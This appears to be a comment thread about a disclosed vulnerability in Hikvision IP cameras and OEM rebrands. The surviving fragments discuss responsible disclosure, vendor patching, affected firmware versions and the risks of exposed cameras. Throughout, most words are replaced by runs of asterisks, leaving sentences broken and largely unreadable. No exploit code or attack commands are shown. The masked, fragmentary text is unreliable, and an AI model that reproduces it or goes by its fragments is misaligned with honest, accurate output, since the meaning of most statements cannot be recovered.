* ***** **** ** essay ** ***** ******** (*****://***.********.***/******/********/****/**/********************.****):

"******* ******** ****** **** accurately ********* ***** *** risk. ******* ********* ****** debate ***** ********, *** inhibits ******** ********* **** leads ** ************. ******* doesn't ******* ********; ** stifles **."

** ** ******* **-******** is ** ***** **** is ********* *** **** in *** ********. *** so **** *****, ****** really ***** *****. **** products *** * ******** risk *** ********.

***** ******** *** **** about ***** ** ******** by *** ****!

***** *****/******** **** *** talk ***** ***** ** checked ** *** **** if ******* ** ** home!

**** *** *** ** trusted "********" ******** ***** a *** ********** **** to *** ***** ** the ********. **** ***** products, *** **** ** bigger **** ******* *** products *********.

* ********** **** *****, but * ******* **'* much ****** *** *** whole ******** ** ******** the ********* ** **-******** to ***** * ***** where ** *** **** secure ********.

** *** *** * big ***** **** ***** everyone ** **** *** developers, *** - ** a **** - ****** that ** **** ********** will ******* ******* ********. The ******** ******** ** big ****** ***** **** this ** *** *** truth. *** ****** ** developers ** **** ** indication ** *** ***** that ***** ********** *** cause ** **** **** in **** *********.

* **** **** **** ongoing ********** ***** **** some *********** ***********, *** I ******* **** ******* will ****** ** ** do *** *** ** inform *** **** **** our ******** *** **** the ***-*********.

***** *** **** **** how ** ******* **** issues. ***** *** **** good *** ******** *** there. ***** *** ******* that **** *** *******/******* built-in, **** ******* *** to ********* ****** *********** to *** ********, ** matter **** ****** ***'** using ** ****** *** cameras. *** ******** ***** to ***** ** ***** IT-Security, **** ***** **** if *** ****** ******** cause * ********* ****.

**** ** * *****

#*, ****** *** *** feedback *** * ********** the *******.

*****, **** ** ******* damaging ******'* *********. **** is *** ** *** effectively *********** *** *** camera(s) *** *** ****.

*******, ** ***** ** talk ** ***********, ****'********** ** *** ****** disclosure **** ***** ******. **** ** *** key *******:

******* **** ********* ******* only ******* ******** ****** by ***********, *** *** flash ********* **** ** render ******** ** ********* of ********* ******* *********** unusable **** **** *** simple **** ****.

** *** '***********' ** fairly ******* ***** *** bad *** ********* ******** is.

** ***** ** *********, the ******* ** ** many ****** ** **** industry ****** ************* **********. The ***** '*** ****** could **** ** ***** so *** *****!'

*** **** ** **** live **** ** ** show ****** **** ***** and *** **** ****** care ***** *************.

*** ******** ** ****** the ****** ** ******** is **** ***** ***. Many ************* **** ** keep ***** *** ***** to ***** ***** ** require ** ***. *** the **** *** *** there *** ***********.

** ** ***'* **** it, ****** **** **** it *** ***** *****. Some ************* ******** **** their ***.

********* **** ********** *** a ***** *****, ** was *** ** **** forward * ****** *** remote *******, ***********, ***. End ** *****. *** end **** *** *** use ** **** *** anymore, *** ***** ***. Or **** *** ** app ** **** *** camera *** ** **** works.

*** ******** ***** ** be ** *** ******.

****** *** **** **** thru *** ****** ***** network **** ********* **** or ** *** ********** it ** *** ******** is ******* * * key **** ** ******** by ****** *** ******* in ***** **********.

*** *** ********** ** iran **** ********* ** connected ** *** ********? Even *** ****** ******* need **** ***** ********.

*** *** ********** ** iran **** ********* ** connected ** *** ********? Even *** ****** ******* need **** ***** ********.

**** ** ** ********* example ** *** *** cannot **** ** ******** device ****** ****** ** network ************ *****. *** can ******** *** ****, but *** ********* **.

**** ******-** ** **** '************' **** *** ********* *** *** other ***...

*** ** **** ******* directed **?

* **** ****** ** comment ** *** ******** part.
****** *** ******* ** your *** *** *** published ** *** ******** does ***
**** ******* ***'* *** in. ** ** ******** the ******* ******, ** is *********
***** ****** ** **** cost ********* ******. ***** tend ** ** ***** stores ***
***** ***** ***********. **** of ***** ********* ***** free **** ** ***** customers.
*************, ******** ** ***** people **** **** *** router (***/**** ********)
***** ****** *** ******, Cameras *** ********* ****. Hopefully **** ****
******* *** ******* ******** on *** ******. *** it ** ********* **** for * ******
** *** *****, *** the **** ******* *** monitor *** ******* *********** cash ************.

* ***** **** ** further ** ******** *** that **'* **** **** to ******** * ***** recording
****** ***** * ********* Pi, **** ** ** to *** ******** *** have ** ****** *** closing
********* ** *** ********. Now *** ****** *** sufficient *********** ** *** the *****.
********, * **** **** many ****** ***** *** camera ******** ******* *** code ** ***
**** *** **** ***** to ***** ** ****** overnight.

******, ** *** **** exploits *** *******!!!
***** ** ****** * way **, **'* **** a ****** ** *** difficult *** **** ** for *** *******.
**** ******* **** *** in, ****** ********** ****, effort, ****** (*** ****** engineering). *** **** *******, all ****** ******* ** the *****, ******* **** knowledge, **** **** * field ***.

*** *** *** ********* on ********* **** *** already ******** **? **** exploit *** **** *******. Common ***** ***** ** people ****** ** ********* the ******** **** ***** this.

**** **** ** *** show ** ** ******* in *** ******* ********.

*** ******** ******** ******* the **** **** ***** was * *************, *** the ******* *** *** been ******** *********. ***** this ******* * ****** of **** *** ********* users, ***** *** ** least *** ******* **** specifics **** *** ******** known.

***, *** ********** ****** the ******* *** ******** full *******, ***** *** significantly ********* *** **** to ********* ****** ******. This ** *** ** released *** *** ****** (and *** ********* ****** have *********** ******** *********).

***, *** ******** *** patched **** *******, ******* our ***** **** ******** of ********* ** ******* with ****** ************* *** still **********. ******* ******* likely **** ** ***** be *******, ** **** are ********** ** ****** attacks ** *** ******** connected ** *** ********.

**** **** ** *** show ** ** ******* in *** ******* ********.

***** *********'* ***** ****** of *************** *** ********, it *** ** **** a ****** ** **** before **** ** ****. I **** *** ** not ***** **** *** current ******** ** ******* the *** **** *** removed *** ********, *********, and ***** **** **** compromise *** ******** ** Hikvision *******, ** **** would ** **** ********.

** **'* ********** ************** to **** **** ********* are ********* ***** ********? If *** *** **, patching * ******** ** a **** ***** ******.

**, ** ** ***** responsibility ** **** **** their ******** **** *** have ****** *********** ********* in *** ***** *****.

******** ******** ** * good ***** ****** ** you *** ****** ******* bugs, ****-**** *********, *** enhancing *************. ******** ******** to ***** ***** ********* is **** ****** * bank ****** *** * good ***** ****** ** returning ***** ** *** occasions ** ** ******.

******* ****** **** **** is ********* ** **** people *** ****** "******** recovery *********" *** ******* them ** *** ********. Thus, **** ******* ** out ***** *** *****. It ** ********* *** a *** ****** *** end **** ** **** about **** *** ******* against **. **********, ** was * ************* ** theory, *** *** ***** exploit **, *** *** had ** **** ***'* word ** ** ** to **** ** ***, how *** ** ***, etc.

*** ***** ** ***** that ** ***'* **** a "********* **********" ** they ***** ** **** it, ** ********* ******* pages, ***. ** ** a **** ****.

** ****** *** ***'*/***'* update *** ******** ** installed *******, *** **** could **** *********, *** force ***** ** ****** firmware. **** *** ****** their *****, *** *** stand ****** ***** ***** partners (***** ***/*** ******* & *****), *** **** clearly ****** ****** (***** off) ** **** *** service.

**** ** **** * basic *******. ** ********* modification ** **** ** cookies, ***. **** ** even ***** **** *** Sony ******** ******** ***** from **** ****.

****** **** ****** **** shut **** *** **** and ***** **** ***** is/is ** ********, ***. Any ******* **** **** than * *** *********** and *** *** *** fresh *** ** ****** would ***** ***** **** in. ***** *** ** many ***** *********** **** to **** ****. ** they ***** ***** ********, they ***** **** ***** care ** **** ** their *** *** ****** it **** ** * "security ***********" *** ** it **** **** *** in *** ******** **** brush ** *** ** a *********** ***** **** was ***** **** **.

*******, ********** **** ** find **** ** ***** own *** ******* ** to **** *********** ** expose ** ** ***** them ** *** **.

** *** *** **** market *****, ** ** still ***** **************. **** if *** ******** *** designed *** *** ******* market, ** ***** ** be *****. ** ** still * ****** ************ by ****, ** ***** their ********. *** ** story.

********* *** ***** **** to ***** ******** ******** they ***** ***** *** Apple/Android/Windows ****** ***** *** push ******* ** ******* devices. ******* ** ****'* work ** **** * couple ** ***** **** with **** ****** *** other ******* ********** ****** app ****** ******** ******* accidentally. ** **** ***** past ****** **.

*** ******* ***** ** ***'* ********* *** ******** ***? ** this *******, **** ***** ******* ******** *** ****** ** ********** devices ***** ***** ******. *** *** ******* ******** *** ****** in *** ******* ********* *****?

***, **** ***** * section ********** ************* ** OEM *******:

OEMs **********

**** ******** *** **** found ** *** *******, we ****** *** ********* cameras *** ***** **** vulnerable:

  • *** *********-*** ** ******** V5.4.0build ******
  • ***** **** ****** - 0E-21BF40 -****** ** ******** V5.3.0build ******

***** ********* *** ******* are ****** ********** ** well, *********** ********** *** number ** ********** ******* online *************.

****** *****, ** ***** be **** *********** ** you ***** ****** *** numbers ** ********** ******* found ** ****** ********* OEMs ** *** *** full *********/****** ** **** exploit. *** * ***** understand ** **** ** too **** **** ☺️

*'** **** ******* *** ** ***** *** ** ****. **** risks *** ***** ** **?

** ******** ***** *** *** ****** ********* ***. *** ** my *****, **** **** ***** * ******** ** ******* **** me *** ** ** ****** ** *** ** ** ********?

**** *** ****** ** on *** **** *** as *** ******* **** PCs **** ******* ****** passwords, ****** *****, *** return ****, ****** ******** numbers, ***.?

********* ***** *** *** cameras **** *** ********, the **** ** ************************* ** ****.

**** ********* *************** ***** exist **** ********** **** be ********** *** ********* is ********** ** *****. It ***** **** ** trust ** *** ********.

* ******* ** ******. **** ** **** ****, ***** ***.

** **** ****** **. **** ***** ** *** ** **/**** SV:V5.4.5_170124

****----- ***** ****** **** *** ******* *** ******* *** ****, this ****** ****** ** ****.

******** *** ****** ** the ****** ******** (********* it's ***** *** *** model) ** *** ***** step, *** *** ****** probably ** ***** ***** that **** ****** *****'* have **** ******* ****** you ******* *** ******. That ****** ******* ** least *** ****** ** its ******** ** ********, even ** *** ******* and ******* ******* **** turned *** **** *** camera ** *******. ** you **** ****** ****** to *** ******, *** a *** *** *******.

********* *********, **'* ***** situational. ******* *** *** access ** *** ****** somehow ******** **** **** to **** **** ***'** not ****, *** ** the ****** ** ** your ***** ******* **** all *** ***** ****, it ***** ** *****. If ** **** ***** the ****** ******* ********** to *** ********, **'* only * ****** ** time ****** ******* ****** your **** *** ******* it, ******* **** ** prank *** ** *** on **** ******** **** just *** ***** ** not ******.

** *** ****** ** not ********** *** ******** and ****** ****** *** internet, **'* ****** *** house *** ***'** ********* your ***** ******* ***'* have ***** ******* ** such ******, **'* ******** fairly **** ** *** it. **'* *** **** where ******* ******* **** house *** **** ** that ***** ** * risk **** ***** ***** of ***** *********.

...

****** -

** ******** *** ********* video, ******* **** *** simple ** ** ** utilize **** ******* ** retrieve ** ***** ******** and ****** *********** **** a ******. ** **** show *** ******** ***** tool ** ***:

*****,

**** ** ***** "********" ***** **** *.*.* ********

**** ** ********, ** it *** ***** ** version *.*.* (******** ** March ****) *** **** models.

**** *********'* "*********-********** ************* Notice":

********* ******** ** **** and ** ************* ************ *** **** ****:

** == **** ********??!

** == **** ********??!

***, ***** *** *** clarifying ****.

**, ** **** *******, is "******* **, ********* ** Hikvision *** ***. *** Hikvision ****** ***"

******, ******.

*** ******* ** ***** overly ********* ***** *******. * **** ***** read *** ******** ** "promoting ********* ******** ***** China *** *** ******* people."

* ******* ** ** correct ** "*****" = Chinese ********** *** "******* people" = ********* *********.

*** **** ********* ******** to ****** *** *******? They ****** ***** ** continuous ************** *** ******* improvement.

****** **** ******* ** reminding ***** **** ************* is * ******* *** everyone ******* ** ****** a ***** *** **** at ***** (*** ** Headquartered ****** *** ******) he *** ***** ** a ************ ******, *** spoke ***** *** **** threats. ** ***** ** difference ***** ************ *** prefer ******** ** ***** to **** ** ************* because ** ** ** ongoing ****** ** *** equipment.

** ***** ***** *** finger ** ** *****, but ******** **** *** point *** ****** ** me *** *** ******** three ** ********!

****** **** ******* ** reminding ***** **** ************* is * ******* *** everyone

***** ****** ** ** make ************* * ***-***** by ******* **** ******** has *** **** ***** security ********. *** *********'* track ****** ** *** last **** (**** * magic ****** ********, * compromised ****** *******, ******** passwords ** ***** ****, cracked ******** *****, ***.) show *********.

* *** ********* ********** the ***** ***** ****** to ** **** *** the ********** ******* ** factually *****.

“***** ***** **** * ****, ********* *** *** ** **** to **** *** **********.”
― **** *****

**, *** ****** **** are *****?

****, * ****’* ** ** *** * ** **** ** funny!
